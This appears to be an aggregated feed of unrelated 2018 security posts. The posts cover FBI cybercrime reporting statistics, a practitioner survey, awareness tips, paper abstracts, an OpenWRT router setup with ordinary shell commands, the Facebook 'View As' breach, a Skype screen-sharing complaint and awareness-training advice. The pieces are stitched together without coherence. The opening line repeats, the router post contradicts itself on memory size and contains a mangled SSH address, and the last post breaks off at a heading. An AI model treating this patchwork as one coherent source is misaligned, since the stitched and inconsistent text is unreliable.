Don’t let your cybersecurity good practice fall by the wayside the moment you enter your front door. Following our common sense tips will keep you and your loved ones safe at home and at work.
Don’t let your cybersecurity good practice fall by the wayside the moment you enter your front door. Following our common sense tips will keep you and your loved ones safe at home and at work.
Despite being a misquote, I've used it often myself. There is no way to tell if you are "improving" your response to a crime type if you don't first have valid statistics for it. Why the quote always pops to mind, however, is because, in the case of cybercrime, we are doing a phenomenal job of ignoring it in official police statistics. This directly reflects the ability and the practice of our state and local law enforcement agencies to deal with online crime, hacking, and malware cases. Want to test it yourself? Call your local Police Department and tell them your computer has a virus. See what happens.
It isn't for lack of law! Every State in the Union has their own computer crime law, and most of them have a category that would be broadly considered "hacking." A quick reference to all 50 states computer crime laws is here: State Computer Crime Laws - and yet with a mandate to report hacking to the Department of Justice, almost nobody is doing it.
You may be familiar with the Uniform Crime Report, which attempts to create a standard for measurement of crime data across the nation. UCR failed to help us at all in Cybercrime, because it focused almost exclusively on eight major crimes that were reported through the Summary Reporting System (SRS):
murder and non-negligent homicide, rape, robbery, aggravated assault, burglary, motor vehicle theft, larceny-theft, and arson.
The data for calendar year 2017 was just released this week and is now available in a new portal, called the Crime Data Explorer. Short-cut URL: https://fbi.gov/cde
To capture other crime types, the Department of Justice has been encouraging the adoption of the NIBRS - the National Incident-Based Reporting System. This system primarily focuses on 52 crime categories, and gathers statistics on several more. Most importantly for us, it includes several categories of "Fraud Crimes"
- 2 / 26A / False Pretenses/Swindle/Confidence Game
- 41 / 26B / Credit Card/ATM Fraud
- 46 / 26C / Impersonation
- 12 / 26D / Welfare Fraud
- 17 / 26E / Wire Fraud
- 63 / 26F / Identity Theft
- 64 / 26G / Hacking/Computer Invasion
Unfortunately, despite being endorsed by most every major law enforcement advocacy group, many states, including my own, are failing to participate. The FBI will be retiring SRS in 2021, and as of September 2018, many states are not projected to make that deadline:
Of those eight "fraud type" crimes, the 2017 data is not yet available for detailed analysis (currently most of state data sets, released September 26, 2018, limit the data in each table to only 500 rows. Since, as an example, Hoover, Alabama, the only city in my state participating in NIBRS, has 3800 rows of data, you can see how that filter is inadequate for state-wide analysis in fully participating states!
Looking at the NIBRS 2016 data as a starting point, however, we can still see that we have difficulty at the state and local police level in understanding these crimes. In 2016, 6,191 law enforcement agencies submitted NIBRS-style data. Of those 5,074 included at least some "fraud type" crimes. Here's how they broke down by fraud offense. Note, these are not the number of CRIMES committed, these are the number of AGENCIES who submitted at least one of these crimes in 2017:
type - # of agencies - fraud type description
2 - 4315 agencies - False Pretenses/Swindle/Confidence Game
41 - 3956 agencies - Credit Card/ATM Fraud
46 - 3625 agencies - Impersonation
12 - 328 agencies - Welfare Fraud
17 - 1446 agencies - Wire Fraud
63 - 810 agencies - Identity Theft
64 - 189 agencies - Hacking/Computer Invasion
Only 189 of the nation's 18,855 law enforcement agencies submitted even a single case of "hacking/computer invasion" during 2016! When I asked the very helpful FBI NIBRS staff about this last year, they confirmed that, yes, malware infections would all be considered "64 - Hacking/Computer Invasion". To explore on your own, visit the NIBRS 2016 Map. Then under "Crimes Against Property" choose the Fraud type you would like to explore. This map shows "Hacking/Computer Intrusion." Where a number shows up instead of a pin, zoom the map to see details for each agency.
|Filtering the NIBRS 2016 map for "Hacking/Computer Intrusion" reports|
|Clicking on "Nashville" as an example|
I have requested access to the full data set for 2017. I'll be sure to report here when we have more to share.
What makes security practitioners tick? That’s a simple question with a lot of drivers underneath it. We want to find out; please help us by signing up for our study.
We’re launching a long term study of security practitioners to understand how they approach security, please sign up for our Long Term Security Attitudes and Practices Study here: https://www.surveymonkey.com/r/CZTZY7M.
A few years ago I was in a customer facing role answering questions about security practices of the SaaS company I worked at. My days were filled with answering questions about our security practices and we would give answers that were good and reasonable answers but not always what the other side was expecting. This discrepancies were based on differing risk tolerances, different contexts, varying approaches to security and technology.
This led to many conversations with our executive about changes to our security practices. Often the question would arise: “what’s good enough?” and outside of pointing to ISO27001/2 and HIPAA I didn’t have an answer. I couldn’t tell my executive what would reasonably satisfy our customer’s security expectations beyond pointing to the standards. Clearly though “standards compliance” wasn’t the minimum bar… it was something different. By outcome we could observe that organizations were willing to accept differing security practices but there was never a consistency of what would be accepted and what had to be argued (or changed) across the hundreds of different customers (even ones in the same industry).
Since then I’ve moved on from that company (and changed to an internal role) but those questions have raised for me a more fundamental set of questions: Do we actually understand how security professionals think? Are we all aiming for perfect compliance with PCI 3.X or are we driven by something else? Do we construct policies that are risk centric? Are we pragmatists or purists? Are we advisers or problem solvers?
These are questions that have stuck with me for a while and I’ve not found academic papers that answer these questions and so we’re starting a community based study. Knowing what makes us tick might help make us a stronger profession; at the very least it will be interesting.
The study will consists of multiple surveys; once we get going we’ll start inviting you to a new survey every two weeks. Each survey will be a few questions in length and should not take more than a few minutes of your time. The study will run for as long as there is ongoing interest and sufficient participation. The study doesn’t expect you to participate in every survey although that would be nice; in fact some of the component surveys may not be relevant to you from time to time.
The study will be anonymous; we’ll still collect an email address and track your unique responses but we’ll never share your identity. Tracking you across multiple surveys will allow for correlation – connecting the dots between the many different responses which hopefully will allow us to generate insight.
The anonymized data will be released under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License to allow for reuse by the community. Analysis reports and papers will be released under a Creative Commons License as well and code used to perform the analysis (probably Jupyter Notebooks) will be GPL’ed.
Everyone is welcome – sign up here to participate: https://www.surveymonkey.com/r/CZTZY7M
Don’t we all kinda secretly hope, even pretend, that our biggest fears are in the process of remedying themselves? Like believing that the police will know to stay close should we wander into a sketchy part of town. Or that our doors and windows will promptly self-lock should we forget to do so. Such a world would be ideal — and oh, so, peaceful — but it just isn’t reality. When it comes to making sure our families are safe we’ve got to be the ones to be aware, responsible, and take the needed action.
Our Shared Responsibility
This holds true in making the internet a safe place. As much as we’d like to pretend there’s a protective barrier between us and the bad guys online, there’s no single government entity that is solely responsible for securing the internet. Every individual must play his or her role in protecting their portion of cyberspace, including the devices and networks they use. And, that’s what October — National Cyber Security Awareness Month (NCSAM) — is all about.
At McAfee, we focus on these matters every day but this month especially, we are linking arms will safety organizations, bloggers, businesses, and YOU — parents, consumers, educators, and digital citizens — to zero in on ways we can all do our part to make the internet safe and secure for everyone. (Hey, sometimes the home team needs a huddle, right!?)
8 specific things you can do!
- Become a NCSAM Champion. The National Cyber Security Alliance (NCSAM) is encouraging everyone — individuals, schools, businesses, government organizations, universities — to sign up, take action, and make a difference in online safety and security. It’s free and simple to register. Once you sign up you will get an email with a toolbox packed with fun, shareable memes to post for #CyberAware October.
- Tap your social powers. Throughout October, share, share, share great content you discover. Use the hashtag #CyberAware, so the safety conversation reaches and inspires more people. Also, join the Twitter chat using the hashtag #ChatSTC each Thursday in October at 3 p.m., ET/Noon, PT. Learn, connect with other parents and safety pros, and chime in.
- Hold a family tech talk. Be even more intentional this month. Learn and discuss suggestions from STOP. THINK. CONNECT. on how each family member can protect their devices and information.
- Print it and post it: Print out a STOP. THINK. CONNECT. tip sheet and display it in areas where family members spend time online.
- Understand and execute the basics. Information is awesome. But how much of that information do we truly put into action? Take 10 minutes to read 10 Tips to Stay Safe Online and another 10 minutes to make sure you take the time to install a firewall, strengthen your passwords, and make sure your home network as secure as it can be.
- If you care — share! Send an email to friends and family informing them that October is National Cybersecurity Awareness Month and encourage them to visit staysafeonline.org for tips and resources.
- Turn on multi-factor authentication. Protect your financial, email and social media accounts with two-step authentication for passwords.
- Update, update, update! This overlooked but powerful way to shore up your devices is crucial. Update your software and turn on automatic updates to protect your home network and personal devices.
Isn’t it awesome to think that you aren’t alone in striving to keep your family’s digital life — and future — safe? A lot of people are working together during National Cyber Security Awareness Month to educate and be more proactive in blocking criminals online. Working together, no doubt, we’ll get there quicker and be able to create and enjoy a safer internet.
The post #CyberAware: Will You Help Make the Internet a Safe Place for Families? appeared first on McAfee Blogs.
Technological innovation, globalization, and urbanization have facilitated criminals and terrorists to pose a fresh wave of hazards that can shake the security establishment of global markets. The development of information and communications technology creates not only advantages, convenience and efficiency, but also disadvantages, challenges and threats. The purpose of this paper is to explore into crucial elements in combating cybercrime. The paper identified the following crucial elements as special perpetrator-victim relationship, time elements, spatial elements, technological nature of cybercrime, complexity, costs, anonymity, hidden victims, concealment, trans-territoriality, and fast increase in recent four decades. They should be emphasized in fighting against cybercrime. The paper further analyzes the phenomenon of rent-seeking from the exaggeration of insecurity and cybercrime, which can be misinformation in this battle.
Cloud Computing is considered as the next logical step in emerging technology for prosperous resource outsourcing, information sharing in Physician-Patient relationship and a platform for research development. The fast drift of Ghana’s healthcare facilities into cloud computing for finding treatment to humanity’s major illnesses has called for a pragmatic understanding of its security deterrence techniques. Studies in cryptographic discipline of Ghana’s healthcare require a working understanding of the security issues by Healthcare Administrators. Healthcare data leaked outside to unauthorized users tarnishes the image of such individual, healthcare facility and the Ghanaian populace. This paradigm shift requires a strong and efficient security system among healthcare facilities to avoid the erosion of trust. Our review is motivated by these contemporary technologies to explore it adoptions, utilization and provision of security strategies in this innovation. Much emphasis were placed on network, interfaces, data, virtualization, legal, compliance and governance as key areas of security challenges in cloud computing. Relevant literatures were discussed to highlight their prominent findings. The contributions presented are relevant in providing a practical framework for enhancing security in other disciplines as well.
It is a big concern to provide the security to computer system against malware. Every day millions of malware are being created and the worse thing is that new malware is highly sophisticated which are very difficult to detect. Because the malware developers use the various obfuscation techniques to hide the actual code or the behaviour of malware. Thereby, it becomes very hard to analyze the malware for getting the useful information in order to design the malware detection system because of anti-static and anti-dynamic analysis technique (obfuscation techniques). In this paper, various obfuscation techniques are discussed in detail.
Cloud computing has produced a paradigm shift in large-scale data outsourcing and computing. As the cloud server itself cannot be trusted, it is essential to store the data in encrypted form, which however makes it unsuitable to perform searching, computation or analysis on the data. Searchable Symmetric Encryption (SSE) allows the user to perform keyword search over encrypted data without leaking information to the storage provider. Most of the existing SSE schemes have restrictions on the size and the number of index files, to facilitate efficient search. In this paper, we propose a dynamic SSE scheme that can operate on relatively larger, multiple index files, distributed across several nodes, without the need to explicitly merge them. The experiments have been carried out on the encrypted data stored in Amazon EMR cluster. The secure searchable inverted index is created instantly using Hadoop MapReduce framework during the search process, thus significantly eliminate the need to store document-keyword pairs on the server. The scheme allows dynamic update of existing index and document collection. The parallel execution of the pre-processing phase of the present research work enables to reduce processing time at the client. An implementation of our construction has been provided in this paper. Experimental results to validate the efficacy of our scheme is reported.
Unfortunately, these devices had extraordinarily limited memory (16-megabytes) and even more limited storage (4-megabyte). That's megabytes -- the typical size of an SD card in an RPi is a thousand times larger.
I'm interested in that device for the simple reason that it has a big-endian CPU.
All these IoT-style devices these days run ARM and MIPS processors, with a smattering of others like x86, PowerPC, ARC, and AVR32. ARM and MIPS CPUs can run in either mode, big-endian or little-endian. Linux can be compiled for either mode. Little-endian is by far the most popular mode, because of Intel's popularity. Code developed on little-endian computers sometimes has subtle bugs when recompiled for big-endian, so it's best just to maintain the same byte-order as Intel. On the other hand, popular file-formats and crypto-algorithms use big-endian, so there's some efficiency to be gained with going with that choice.
I'd like to have a big-endian computer around to test my code with. In theory, it should all work fine, but as I said, subtle bugs sometimes appear.
The problem is that the base Linux kernel has slowly grown so big I can no longer get things to fit on the WR703N, not even to the point where I can add extra storage via the USB drive. I've tried to hack a firmware but succeeded only in bricking the device.
So this post is about the steps I took to get things working for myself.
The first step is to connect to the device. One way to do this is connect the notebook computer to their WiFi, then access their web-based console. Another way is to connect to their "LAN" port via Ethernet. I chose the Ethernet route.
The problem with their Ethernet port is that you have to manually set your IP address. Their address is 192.168.8.1. I handled this by going into the Linux virtual-machine on my computer, putting the virtual network adapter into "bridge" mode (as I always do anyway), and setting an alternate IP address:
# ifconfig eth:1 192.168.8.2 255.255.255.0
The firmware I want to install is from the OpenWRT project which maintains Linux firmware replacements for over a hundred different devices. The device actually already uses their own variation of OpenWRT, but still, rather than futz with theirs I want to go with a vanilla installation.
I download this using the browser in my Linux VM, then browse to 192.168.8.1, navigate to their firmware update page, and upload this file. It's not complex -- they actually intend their customers to do this sort of thing. Don't worry about voiding the warranty: for a ~$20 device, there is no warranty.
The device boots back up, this time the default address is going to be 192.168.1.1, so again I add another virtual interface to my Linux VM with "ifconfig eth:2 192.168.1.2" in order to communicate with it.
I now need to change this 192.168.1.x setting to match my home network. There are many ways to do this. I could just reconfigure the LAN port to a hard-coded address on my network. Or, I could connect the WAN port, which is already configured to get a DHCP address. Or, I could reconfigure the WiFi component as a "client" instead of "access-point", and it'll similarly get a DHCP address. I decide upon WiFi, mostly because my 24 port switch is already full.
The problem is OpenWRT's default WiFi settings. It's somehow interfering with accessing the device. I can't see how reading the rules, but I'm obviously missing something, so I just go in and nuke the rules. I just click on the "WAN" segment in the firewall management page and click "remove". I don't care about security, I'm not putting this on the open Internet or letting guests access it.
To connect to WiFi, I remove the current settings as an "access-point", then "scan" my local network, select my access-point, enter the WPA2 passphrase, and connect. It seems to work perfectly.
While I'm here, I also go into the system settings and change the name of the device to "MipsDev", and also set the timezone to New York.
I then disconnect the Ethernet and continue at this point via their WiFi connection. At some point, I'm going to just connect power and stick it in the back of a closet somewhere.
DHCP assigns this 10.20.30.46 (I don't mind telling you -- I'm going to renumber my home network soon). So from my desktop computer I do:
C:\> ssh firstname.lastname@example.org
...because I'm a Windows user and Windows supports ssh now g*dd***it.
OpenWRT had a brief schism a few years ago with the breakaway "LEDE" project. They mended differences and came back together again the latest version. But this older version still goes by the "LEDE" name.
At this point, I need to expand the storage from the 16-megabytes on the device. I put in a 32-gigabyte USB flash drive for $5 -- expanding storage by 2000 times.
The way OpenWRT deals with this is called an "overlay", which uses the same technology has Docker containers to essentially containerize the entire operating system. The existing operating system is mounted read-only. As you make changes, such as installing packages or re-configuring it, anything written to the system, is written into the overlay portion. If you do a factory reset (by holding down the button on boot), it simply discards the overlay portion.
What we are going to do is simply change the overlay from the current 16-meg on-board flash to our USB flash drive. This means copying the existing overlay part to our drive, then re-configuring the system to point to our USB drive instead of their overlay.
This process is described on OpenWRT's web page here:
It works well -- but for systems with more than 4-megs. This is what defeated me before, there's not enough space to add the necessary packages. But with 16-megs on this device there is plenty off space.
The first step is to update the package manager, such like on other Linuxs.
# opkg update
When I plug in the USB drive, dmesg tells me it finds a USB "device", but nothing more. This tells me I have all the proper USB drivers installed, but not the flashdrive parts.
[ 5.388748] usb 1-1: new high-speed USB device number 2 using ehci-platform
Following the instructions in the above link, I then install those components:
# opkg install block-mount kmod-fs-ext4 kmod-usb-storage-extras
Simply installing these packages will cause it to recognize the USB drive in dmesg:
[ 10.748961] scsi 0:0:0:0: Direct-Access Samsung Flash Drive FIT 1100 PQ:
0 ANSI: 6
[ 10.759375] sd 0:0:0:0: [sda] 62668800 512-byte logical blocks: (32.1 GB/29.9 G
[ 10.766689] sd 0:0:0:0: [sda] Write Protect is off
[ 10.770284] sd 0:0:0:0: [sda] Mode Sense: 43 00 00 00
[ 10.771175] sd 0:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn'
t support DPO or FUA
[ 10.788139] sda: sda1
[ 10.794189] sd 0:0:0:0: [sda] Attached SCSI removable disk
At this point, I need to format the drive with ext4. The correct way of doing this is to connect to my Linux VM and format it that way. That's because in these storage limited environments, OpenWRT doesn't have space for such utilities to do this. But with 16-megs that I'm going to overlay soon anyway, I don't care, so I install those utilities.
# opkg install e2fsprogs
Then I do the normal Linux thing to format the drive:
# mkfs.ext4 /dev/sda1
This blows away whatever was already on the drive.
Now we need to copy over the contents of the existing /overlay. We do that with the following:
# mount /dev/sda1 /mnt
# tar -C /overlay -cvf - . | tar -C /mnt -xf -
# umount /mnt
We use tar to copy because, as a backup program, it maintains file permissions and timestamps. So it's better to backup and restore. We don't want to actually create a file, but instead use it in streaming mode. The '-' on one invocation causes it to stream the results to stdout instead of writing a file. the other invocation uses '-' to stream from stdin. Thus, we never create a complete copy of the archive, either in memory or on the disk. We untar files as soon as we tar them up.
At this point we do a blind innovation I really don't understand. I just did it and it works. The link above has some more text on this, and some things you should check afterwards.
# block detect > /etc/config/fstab; \
sed -i s/option$'\t'enabled$'\t'\'0\'/option$'\t'enabled$'\t'\'1\'/ /etc/config/fstab; \
sed -i s#/mnt/sda1#/overlay# /etc/config/fstab; \
At this point, I reboot and relogin. We need to update the package manager again. That's because when we did it the first time, it didn't include packages that could fit in our tiny partition. We update again now with a huge overlay to get a list of all the package.
# opkg update
For example, gcc is something like 50 megabytes, so I wouldn't have fit initially, and now it does. it's the first thing I grab, along with git.
# opkg install gcc make git
Now I add a user. I have to do this manually, because there's no "adduser" utility I can find that does this for me. This involves:
- adding line to /etc/passwd
- adding line to /etc/group
- using passwd command to change the password for the accountt
- creating a directory for the user
- chown the user's directory
My default shell is /bin/ash (BusyBox) instead of /bin/bash. I haven't added bash yet, but I figure for a testing system, maybe I shouldn't.
I'm missing a git helper for https, so I use the git protocol instead:
$ git clone git://github.com/robertdavidgraham/masscan
$ cd masscan
At this point, I'd normally run "make -j" to quickly build the project, starting a separate process for each file. This compiles a lot faster, but this device only has 64-mgs of RAM, so it'll run out of space quickly. Each process needs around 20-megabytes of RAM. So I content myself with two threads:
$ make -j 2
That's enough such that one process can be stuck waiting to read files while the other process is CPU bound compiling. This is a slow CPU, so that's a big limitation.
The final linking step fails. That's because this platform uses different libraries than other Linux versions, the musl library instead of glibc you find on the big distros, or uClibc on smaller distros, like those you'd find on the Raspberry Pi. This is excellent -- I found my first bug I need to fix.
In any case, I need to verify this is indeed "big-endian" mode, so I wrote a little program to test it:
int x = *(int*)"\1\2\3\4";
It indeed prints the big-endian result:
The numbers would be reversed if this were little-endian like x86.
Anyway, I thought I'd document the steps for those who want to play with these devices. The same steps would apply to other OpenWRT devices. GL-iNet has some other great options to work with, but of course, after some point, it's just easier getting Raspberry Pi knockoffs instead.
On Sept. 28, Facebook announced via its blog that it discovered attackers exploited a vulnerability in its code that impacted its "View As" feature. While Guy Rosen, VP of product management, notes that the investigation is still in its early stages, the breach is expected to have affected 50 million accounts. It is unclear at this stage whether these accounts were misused or if any personal information has been accessed.
According to Rosen’s post, attackers were able to steal Facebook access tokens – digital keys that allow users to stay logged in whether or not they’re actively using the application – which could then be used to take over user accounts. The breach is reportedly a result of multiple issues within Facebook's code, stemming from changes made to the social media platform’s video-uploading feature in July of last year that impacted the “View As” feature.
Veracode’s Chris Wysopal assumes that the attack was automated in order to collect the access tokens, given that attackers needed to both find this particular vulnerability to get an access token, and then pivot from that account to others in order to steal additional tokens.
In reviewing the available details, Veracode’s Chris Eng suggests that an educated guess could lead to the conclusion that having two-factor authentication enabled on the account may not have protected users. Given that the vulnerability was exploited through the access token as opposed to the standard authentication workflow, it is unlikely second-factor verification would have been triggered.
Facebook reportedly fixed the vulnerability and informed law enforcement of the breach and is temporarily turning off the "View As" feature while they undergo security checks. Additionally, the company has reset the access tokens to the affected accounts and is taking the precautionary step of resetting access tokens for another 40 million accounts that have been subject to a “View As” look-up in the last year.
Let’s roll back the time machine a century. Imagine you were a rich individual and you had a huge home with assets that needed protection. What was your recourse? Hire macho security guards with stern faces to ward off miscreants. Slowly the human guards gave way to padlocks, combination locks etc. And then the advent of the home security system – independent and isolated. And towards the latter part of the century, integrated systems with a wired or wireless backhaul to a central command. That then evolved into more sophisticated perimeter security with cameras, motion detectors etc.
But even in the face of such dramatic changes in home security, one principle has remained steady. It is all about the perimeter. Secure the entrance and exits and you are safe.
Another day, another Facebook story. In May, a Facebook Messenger malware named FacexWorm was utilized by cybercriminals to steal user passwords and mine for cryptocurrency. Later that same month, the personal data of 3 million users was exposed by an app on the platform dubbed myPersonality. And in June, millions of the social network’s users may have unwittingly shared private posts publicly due to another new bug. Which brings us to today. Just announced this morning, Facebook revealed they are dealing with yet another security breach, this time involving the “View As” feature.
Facebook users have the ability to view their profiles from another user’s perspective, which is called “View As.” This very feature was found to have a security flaw that has impacted approximately 50 million user accounts, as cybercriminals have exploited this vulnerability to steal Facebook users’ access tokens. Access tokens are digital keys that keep users logged in, and they permit users to bypass the need to enter a password every time. Essentially, this flaw helps cybercriminals take over users’ accounts.
While the access tokens of 50 million accounts were taken, Facebook still doesn’t know if any personal information was gathered or misused from the affected accounts. However, they do suspect that everyone who used the “View As” feature in the last year will have to log back into Facebook, as well as any apps that used a Facebook login. An estimated 90 million Facebook users will have to log back in.
As of now, this story is still developing, as Facebook is still investigating further into this issue. Now, the question is — if you’re an impacted Facebook user, what should you do to stay secure? Start by following these tips:
- Change your account login information. Since this flaw logged users out, it’s vital you change up your login information. Be sure to make your next password strong and complex, so it will be difficult for cybercriminals to crack. It also might be a good idea to turn on two-factor authentication.
- Update, update, update. No matter the application, it can’t be stressed enough how important it is to always update an app as soon as an update is available, as fixes are usually included with each version. Facebook has already issued a fix to this vulnerability, so make sure you update immediately.
The post Facebook Announces Security Flaw Found in “View As” Feature appeared first on McAfee Blogs.
Facebook announced on Friday that it has suffered a data breach affecting up to 50 million users. According to a report from the New York Times, Facebook discovered the attack on Tuesday and have contacted the FBI. The exploit reportedly enables attackers to take over control of accounts so, as a precaution, the social network has automatically logged out more than 90 million potentially compromised accounts.
One of the men involved in an ATM jackpotting scheme in January this year is already facing punishment. A district court in Connecticut has sentenced Argenys Rodriguez to just over a year in prison, plus two years of supervised release and $121,355 in restitution, for collaborating on hacks that slipped malware into bank machines and forced the devices to spit out their cash. Rodriguez had pleaded guilty to bank fraud in June and will start his sentence on November 26th.
Source: Department of Justice
A white-hat hacker briefly promised to livestream his bid to hack into Mark Zuckerberg's Facebook account on Sunday, September 30th). "Broadcasting the deletion of Facebook founder Zuck's account," Chang Chi-yuan told his 26,000-plus followers on the social network, adding: "Scheduled to go live." By Friday afternoon, the stream had been cancelled.
Source: Chang Chi-yuan (Facebook)
Home again! Another NDC is down and I talk a little about how the talks were rated and about PubConf (make sure you get to one of these one day!) I've got another couple of weeks at home before any more travel and I'll talk more about the next things as they draw closer.
This week, I'm on my new iPhone (which is very similar to my old iPhone), I'm talking about Uber getting fined, Cloudflare introducing some very cool new things, Firefox Monitor launching on top of the HIBP APIs and my newfound love for the Pi-hole. Seriously, this is a very cool bit of tech and a fun project to build for home. I'll share more over time as I get a better idea of its strengths and weaknesses but for now, yeah, just get one!
- Despite my dislike of Face ID, I've rolled over to the new iPhone Xs (that's a link through to the blog post on the dramas I was having with it)
- Uber got pinged $148M for their breach (their concealment of it deserves a big penalty, but there's been no personal impact from it)
- Cloudflare is making bandwidth cheap (the Bandwidth Alliance could be awesome for costs!)
- Plus, they're becoming a domain registrar (yet another way of making the platform more accessible and driving down costs)
- Mozilla launched Firefox Monitor (yes, it's effectively another skin on HIBP, but it massively expands the reach of the service)
- Pi-hole - get one! (so impressed with this little beaudy!)
- And here's the ad blockers blog post just for good measure (I'd really like to see a more responsible approach on their behalf)
- DigiCert is sponsoring my blog this week (they're really putting a lot of work into IoT security lately, check 'em out!)
Cisco today exposed 13 vulnerabilities in its IOS and IOS XE switch and router operating software that the company said should be patched as soon as possible.
The vulnerabilities were detailed in Cisco’s twice-yearly dump of IOS exposures. All have a High Impact security rating, and fixes should be evaluated by users quickly.
The company said this particular batch of issues could let an attacker gain elevated privileges for an affected device or cause a denial of service (DoS) on an affected device.
Here at Heimdal Security, we spread our time between providing security tools to prevent serious attacks like ransomware or next-gen malware and providing the education necessary to keep personal data safe across various platforms and devices.
Sometimes, it becomes obvious that tools and education alone won’t keep users truly safe online, nor will they enforce their privacy. Sometimes, ubiquitous, extremely popular services release some features that truly boggle the mind. Skype for Business is one.
This week, we discovered a serious security risk and privacy breach with the Skype for Business app. It was not related to hacking and other cyber-attacks but a pure “feature”, whose purpose and value we haven’t yet been able to decipher.
If you do a Skype for Business call with “screen-sharing” turned on, be prepared to share more than what you wanted.
Once the person who started screen-sharing hangs up, the desktop-sharing function will continue. The people at the other end of the line will still see what’s happening there.
If the person who had hosted the session does not notice the tiny warning at the top, they will continue sharing whatever they’re doing on the screen. Spreadsheets with sensitive financial data, inbox contents, private messages on Facebook, all of them will be seen by the other person.
Had a cybercriminal participated in a conversation like this, they would have had a field day with the info obtained. In some areas, a competitor could do seriously damage with how much information they are able to see.
We thought that we had stumbled upon a serious security flaw. Imagine our surprise when, after a few seconds of Googling the issue and thinking about contacting Microsoft, we came across this thread. No, screen sharing after ending a call is a “feature, not a bug”. Never mind the fact that a regular Skype user first calls someone to start a meeting, then opens a presentation, then closes the call and assumes that the entire interaction ended.
Why would someone possibly want for their screen to still be visible to the other person, even though the dialogue ended? Even if, by chance, that was the case, the tiny ribbon that lets you know screen-sharing has such an unobtrusive design, a regular user will definitely miss it. For such a security-sensitive feature, you’d think neon colors were in order. Certainly, a pleasant design should not be the only priority for Skype for Business.
After all, the people using it do have plenty of sensitive information that should not leak.
Here is what the caller who initiated screen-sharing can see once he/she hangs up.
Here is what’s visible to the ones that just left that call. Spoiler: it’s everything the initial caller is currently doing.
And, finally, this is the placement of the ribbon that was designed to let the user know their screen is still being broadcast. It’s almost black, on top of a browser bar of the same color. If someone had a secondary display and they were to continue working on the screen with the Skype for Business window, it would have been almost impossible to spot that message.
Microsoft’s response? “It’s an expected behavior,” said a customer representative. He followed that an invitation to “vote for this feedback” at another link. And a recommendation to “close the Skype for Business chat window to end Skype call and screen sharing at the same time.”
Yes, the official suggestion is to close the entire window, not press the button that’s for ending the call.
Give it a bit more time, and instead of customer support signaling a bad UI design (user interface) and the developers fixing it, someone will tell you to put a sticker on your webcam if you want to stop broadcasting. This is not to mention what a huge GDPR infringement this Skype for Business bug is. Some experts point out that even sharing usernames in unencrypted communications or on screens can be against the General Data Protection Regulation.
Microsoft is not alone in this and could probably pin this one on miscommunication, not bad intentions.
What users have to do is to secure their device with the essential security layers and remain updated with current news, so they can act swiftly and protect themselves and their valuable data.
The post Feature, Bug or Just a Huge Security Risk? Skype for Business, Examined appeared first on Heimdal Security Blog.
Posted under: Research and Analysis
Our last post explained Continuous Contextual Content as a means to optimize the effectiveness of a security awareness program. CCC acknowledges that users won’t get it, at least not initially. That means you need to reiterate your lessons over and over (and probably over) again. But when should you do that? Optimally when their receptivity is high – when they just made a mistake.
So you determine the relative risk of users, and watch for specific actions or alerts. When you see such behavior, deliver the training within the context of what they see then. But that’s not enough. You want to track the effectiveness of your training (and your security program) to get a sense of what works and what doesn’t. If you can’t close the loop on effectiveness, you have no idea whether your efforts are working, or how to continue improving your program.
To solidify the concepts, let’s go through a scenario which works through the process step by step. Let’s say you work for a large enterprise in the financial industry. Senior management increasingly worries about ransomware and data leakage. A recent penetration test showed that your general security controls are effective, but in their phishing simulation over half your employees clicked a fairly obvious phish. And it’s a good thing your CIO has a good sense of humor, because the pen tester gained full access to his machine via a well crafted drive-by attack which would have worked against the entire senior team.
So your mission, should you choose to accept it, is to implement security awareness training for the company. Let’s go!
Start with Urgency
As mentioned, your company has a well-established security program. So you can hit the ground running, using your existing baseline security data. Next identify the most significant risks and triage immediate action to start addressing them. Acting with urgency serves two purposes. It can give you a quick win, and we all know how important it is to show value immediately. As a secondary benefit you can start to work on training employees on a critical issue right away.
Your pen test showed that phishing poses the worst problems for your organization, so that’s where you should focus initial efforts. Given the high-level support for the program, you cajole your CEO into recording a video discussing the results of the phishing test and the importance of fixing the issue. A message like this helps everyone understand the urgency of addressing the problem and that the CEO will be watching.
Following that, every employee completes a series of five 3-5 minute training videos walking them through the basics of email security, with a required test at the end. Of course it’s hard to get 100% participation in anything, so you’ve already established consequences for those who choose not to complete the requirement. And the security team is available to help people who have a hard time passing.
It’s a balance between being overly heavy-handed against the importance of training users to defend themselves. You need to ensure employees know about the ongoing testing program, and that they’ll be testing periodically. That’s the continuous part of the approach – it’s not a one-time thing.
Introduce Contextual Training
As you execute on your initial phishing training effort, you also start to integrate your security awareness training platform with existing email, web, and DNS security services. This integration involves receiving an alert when an employee clicks a phishing message, automatically signing them up for training, and delivering a short (2-3 minute) refresher on email security. Of course contextual training requires flexibility, because an employee might be in the middle of a critical task. But you can establish an expectation that a vulnerable employee needs to complete training that day.
Similarly, if an employee navigates to a known malicious site, the web security service sends a trigger, and the web security refresher runs for that employee. The key is to make sure the interruption is both contextual and quick. The employee did this, so they need training immediately. Even a short delay will reduce the training’s effectiveness.
Additionally, you’ll be running ongoing training and simulations with employees. You’ll perform some analysis to pinpoint the employees who can’t seem to stop clicking things. These employees can get more intensive training, and escalation if they continue to violate corporate policies and put data at risk.
After initial triage and integration with your security controls, you’ll work with HR to overhaul the training delivered during their onboarding process. You are now training employees continuously, so you don’t need to spend 3 hours teaching them about phishing and the hazards of clicking links.
Then onboarding can shift, to focus on establishing a culture of security from Day 1. This entails educating new employees on online and technology policies, and acceptable use expectations. You also have an opportunity to set expectations for security awareness training. Make clear that employees will be tested on an ongoing basis, and inform them who sees the results (their managers, etc.), along with the consequences of violating acceptable use policies.
Again, a fine line exists between being draconian and setting clear expectations. If the consequences have teeth (as they should), employees must know, and sign off on their understanding. We also recommend you test each new employee within a month of their start date to ensure they comprehend security expectations and retained their initial lessons.
Start a Competition
Once your program settles in over six months or so, it’s time to shake things up again. You can set up a competition, inviting the company to compete for the Chairperson’s Security Prize. Yes, you need to get the Chairperson on board for this, but that’s usually pretty easy because it helps the company. The prize needs to be impactful, and more than bragging rights. Maybe you can offer the winning department an extra day of holiday for the year. And a huge trophy. Teams love to compete for trophies they can display prominently in their area.
You’ll set the ground rules, including an internal red team and hunting team attacking each group. You’ll be tracking how many employees fall for the attacks and how many report the issues. Your teams can try physically breaching the facilities as well. You want the attacks to dovetail with ongoing security training and testing initiatives to reinforce security culture.
Run Another Simulation
